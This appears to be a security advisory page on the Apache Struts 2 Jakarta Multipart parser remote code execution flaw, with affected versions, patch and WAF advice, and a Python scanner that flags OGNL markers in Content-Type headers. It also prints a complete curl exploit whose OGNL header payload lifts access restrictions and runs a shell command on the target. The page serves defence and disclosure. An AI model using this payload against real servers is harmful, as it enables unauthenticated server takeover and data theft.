How the mentioned CVE works:
The vulnerability exists in the Jakarta Multipart parser in Apache Struts 2. An attacker can exploit it by sending a malformed Content-Type header within a file-upload request. The parser evaluates the OGNL expression contained in the header before any validation occurs, which allows the injection and execution of arbitrary Object-Graph Navigation Language (OGNL) code on the server. Because OGNL expressions can execute system commands, the flaw lets remote attackers run any command on the underlying server with the same privileges as the Struts application. The exploit is particularly dangerous because it is trivial to perform and requires no authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Says:
`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target/struts2-blank/example/HelloWorld.action`
How It Is Exploited:
A malformed Content-Type header containing an OGNL expression is sent to the application. The exploit is public and widely available, and attackers achieve unauthenticated command execution.
Protection from this CVE:
Immediately upgrade to Struts 2.3.32 or 2.5.10.1. If upgrading is impossible, switch to a different multipart parser. Implement WAF rules to filter malicious Content-Type headers.
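One way to implement the Content-Type filtering recommended above, as an added example that is not the page's or the Struts project's own code: a request is flagged when its Content-Type is not a syntactically valid media type (type/subtype plus well-formed parameters) or carries expression-language markers that never belong in one. The sample requests are constructed for the demonstration.

```python
import re
from typing import List, Optional, Tuple

# Strict media-type grammar (RFC 7231): type "/" subtype *( OWS ";" OWS parameter )
# Token characters follow RFC 7230; a parameter value is a token or a quoted-string.
# Note that "{", "(", "=" and "@" are not token characters, so an OGNL expression
# can never pass this allowlist even if the marker list below is incomplete.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'
_MEDIA_TYPE = re.compile(
    rf"^{_TOKEN}/{_TOKEN}(?:\s*;\s*{_TOKEN}=(?:{_TOKEN}|{_QUOTED}))*\s*$"
)

# Markers of expression-language syntax or static class access; reported as the
# reason so an analyst sees why the header was rejected.
_OGNL_MARKERS = ("%{", "${", "@java.", "@ognl.", "@com.opensymphony", "ProcessBuilder")


def check_content_type(value: str) -> Optional[str]:
    """Return None for a well-formed media type, otherwise a short reason string."""
    for marker in _OGNL_MARKERS:
        if marker in value:
            return f"ognl-marker:{marker}"
    if not _MEDIA_TYPE.match(value):
        return "malformed-media-type"
    return None


def scan_requests(raw_requests: List[str]) -> List[Tuple[int, str]]:
    """Parse raw HTTP requests and report (index, reason) for suspicious Content-Type headers."""
    findings = []
    for i, raw in enumerate(raw_requests):
        header_lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")[1:]  # skip request line
        for line in header_lines:
            name, _, val = line.partition(":")
            if name.strip().lower() == "content-type":
                reason = check_content_type(val.strip())
                if reason:
                    findings.append((i, reason))
    return findings


# Constructed sample traffic: a benign upload, a request whose Content-Type is an
# OGNL expression shell (payload body omitted), and a request with no Content-Type.
SAMPLE_REQUESTS = [
    "POST /example/HelloWorld.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data; boundary=----abc123\r\n\r\n",
    "POST /example/HelloWorld.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: %{(_='multipart/form-data').(x=1)}\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: app.example\r\n\r\n",
]
```

Running `scan_requests(SAMPLE_REQUESTS)` flags only the second request; the same check can be wired into a WAF or reverse-proxy rule that rejects the request before it reaches the multipart parser.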
Impact:
Complete system compromise. Unauthorized remote code execution. Theft of sensitive data, backdoor installation, and server takeover.
Sources:
Reported By: nvd.nist.gov